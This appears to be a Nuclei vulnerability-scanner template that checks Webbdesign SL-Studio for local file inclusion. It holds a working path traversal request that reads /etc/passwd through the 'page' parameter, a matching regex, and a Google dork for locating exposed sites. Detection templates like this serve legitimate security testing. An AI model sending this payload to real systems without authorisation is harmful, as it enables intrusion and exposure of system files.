id: sl-studio-lfi

info:
  name: Webbdesign SL-Studio - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Webbdesign SL-Studio is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2018110187
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    google-query: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.'
  tags: slstudio,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100e979ff67b1036e36348cdc41a1aa96c43c6633a73dfaa22602fbed496f2aa93e0220189f2b3a92046e9c62f949efc69d5e7898f363cf5d3571c13e4d92f6a6b53a6c:922c64590222798bb761d5b6d8e72950
